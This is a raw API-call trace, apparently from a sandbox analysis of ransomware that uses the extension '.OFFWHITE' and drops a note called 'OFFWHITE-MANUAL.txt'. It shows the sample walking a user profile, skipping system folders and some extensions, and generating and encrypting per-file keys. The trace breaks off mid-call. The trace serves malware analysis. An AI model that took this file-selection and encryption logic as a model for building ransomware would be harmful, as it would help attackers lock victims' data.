[0135.228] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat") returned 1 [0135.229] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="programdata") returned -1 [0135.229] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="appdata") returned 1 [0135.229] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="program files") returned -1 [0135.229] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="program files (x86)") returned -1 [0135.229] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.229] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.dat.LOG2" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" [0135.229] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.229] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.229] PathFindExtensionW (pszPath="ntuser.dat.LOG2") returned=".LOG2" [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".exe") returned 1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".log") returned 1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".cab") returned 1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".cmd") returned 1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".com") returned 1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".cpl") returned 1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".ini") returned 1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".dll") returned 1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".url") returned -1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".ttf") returned -1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".mp3") returned -1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".pif") returned -1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".mp4") returned -1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".OFFWHITE") returned -1 [0135.229] lstrcmpiW (lpString1=".LOG2", lpString2=".msi") returned -1 [0135.229] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.229] GetProcessHeap () returned 0x500000 [0135.229] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531950 [0135.230] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.230] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0135.230] GetProcessHeap () returned 0x500000 [0135.230] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531350 [0135.230] GetProcessHeap () returned 0x500000 [0135.230] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531368 [0135.230] GetProcessHeap () returned 0x500000 [0135.230] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5244c0 [0135.230] GetProcessHeap () returned 0x500000 [0135.230] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5245c8 [0135.230] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.230] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.230] SystemFunction036 (in: RandomBuffer=0x531350, RandomBufferLength=0x10 | out: RandomBuffer=0x531350) returned 1 [0135.230] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.230] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.230] SystemFunction036 (in: RandomBuffer=0x531368, RandomBufferLength=0x10 | out: RandomBuffer=0x531368) returned 1 [0135.230] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.230] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.230] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5244c0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5244c0*, pdwDataLen=0x295e990*=0x100) returned 1 [0135.231] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.231] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.231] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5245c8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5245c8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0135.231] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0135.231] SetLastError (dwErrCode=0x0) [0135.231] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5244c0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0135.231] GetLastError () returned 0x6 [0135.231] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0135.231] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0135.231] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0135.231] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="...") returned 1 [0135.231] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="windows") returned -1 [0135.231] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="$recycle.bin") returned 1 [0135.231] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="rsa") returned -1 [0135.231] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="ntuser.dat") returned 1 [0135.231] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="programdata") returned -1 [0135.232] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="appdata") returned 1 [0135.232] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="program files") returned -1 [0135.232] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="program files (x86)") returned -1 [0135.232] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.232] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0135.232] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.232] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.232] PathFindExtensionW (pszPath="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".exe") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".log") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".cab") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".cmd") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".com") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".cpl") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".ini") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".dll") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".url") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".ttf") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".mp3") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".pif") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".mp4") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".OFFWHITE") returned -1 [0135.232] lstrcmpiW (lpString1=".blf", lpString2=".msi") returned -1 [0135.232] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.232] GetProcessHeap () returned 0x500000 [0135.232] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531960 [0135.233] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.233] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0135.233] GetProcessHeap () returned 0x500000 [0135.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531380 [0135.233] GetProcessHeap () returned 0x500000 [0135.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5313b0 [0135.233] GetProcessHeap () returned 0x500000 [0135.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5246d0 [0135.233] GetProcessHeap () returned 0x500000 [0135.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5247d8 [0135.233] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.233] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.233] SystemFunction036 (in: RandomBuffer=0x531380, RandomBufferLength=0x10 | out: RandomBuffer=0x531380) returned 1 [0135.233] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.233] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.233] SystemFunction036 (in: RandomBuffer=0x5313b0, RandomBufferLength=0x10 | out: RandomBuffer=0x5313b0) returned 1 [0135.233] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.233] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.233] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5246d0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5246d0*, pdwDataLen=0x295e990*=0x100) returned 1 [0135.234] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.234] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.234] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5247d8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5247d8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0135.234] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0135.234] SetLastError (dwErrCode=0x0) [0135.234] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5246d0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0135.234] GetLastError () returned 0x6 [0135.234] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0135.234] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0135.234] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0135.234] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="...") returned 1 [0135.234] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="windows") returned -1 [0135.234] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="$recycle.bin") returned 1 [0135.234] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="rsa") returned -1 [0135.234] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0135.235] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="programdata") returned -1 [0135.235] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="appdata") returned 1 [0135.235] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="program files") returned -1 [0135.235] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="program files (x86)") returned -1 [0135.235] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.235] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0135.235] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.235] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.235] PathFindExtensionW (pszPath="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".exe") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".log") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cab") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cmd") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".com") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cpl") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".ini") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".dll") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".url") returned -1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".ttf") returned -1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".mp3") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".pif") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".mp4") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".OFFWHITE") returned 1 [0135.235] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".msi") returned 1 [0135.235] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.235] GetProcessHeap () returned 0x500000 [0135.235] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531970 [0135.236] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.236] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0135.236] GetProcessHeap () returned 0x500000 [0135.236] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531470 [0135.236] GetProcessHeap () returned 0x500000 [0135.236] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531488 [0135.236] GetProcessHeap () returned 0x500000 [0135.236] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5248e0 [0135.236] GetProcessHeap () returned 0x500000 [0135.236] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5249e8 [0135.236] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.236] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.236] SystemFunction036 (in: RandomBuffer=0x531470, RandomBufferLength=0x10 | out: RandomBuffer=0x531470) returned 1 [0135.236] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.236] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.236] SystemFunction036 (in: RandomBuffer=0x531488, RandomBufferLength=0x10 | out: RandomBuffer=0x531488) returned 1 [0135.236] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.236] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.236] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5248e0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5248e0*, pdwDataLen=0x295e990*=0x100) returned 1 [0135.237] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.237] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.237] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5249e8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5249e8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0135.237] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0135.237] SetLastError (dwErrCode=0x0) [0135.237] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5248e0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0135.237] GetLastError () returned 0x6 [0135.237] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0135.237] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0135.237] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0135.237] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="...") returned 1 [0135.237] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="windows") returned -1 [0135.237] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="$recycle.bin") returned 1 [0135.237] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="rsa") returned -1 [0135.237] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0135.238] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="programdata") returned -1 [0135.238] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="appdata") returned 1 [0135.238] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="program files") returned -1 [0135.238] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="program files (x86)") returned -1 [0135.238] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.238] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0135.238] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.238] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.238] PathFindExtensionW (pszPath="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".exe") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".log") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cab") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cmd") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".com") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cpl") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".ini") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".dll") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".url") returned -1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".ttf") returned -1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".mp3") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".pif") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".mp4") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".OFFWHITE") returned 1 [0135.238] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".msi") returned 1 [0135.238] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.238] GetProcessHeap () returned 0x500000 [0135.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531980 [0135.239] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), 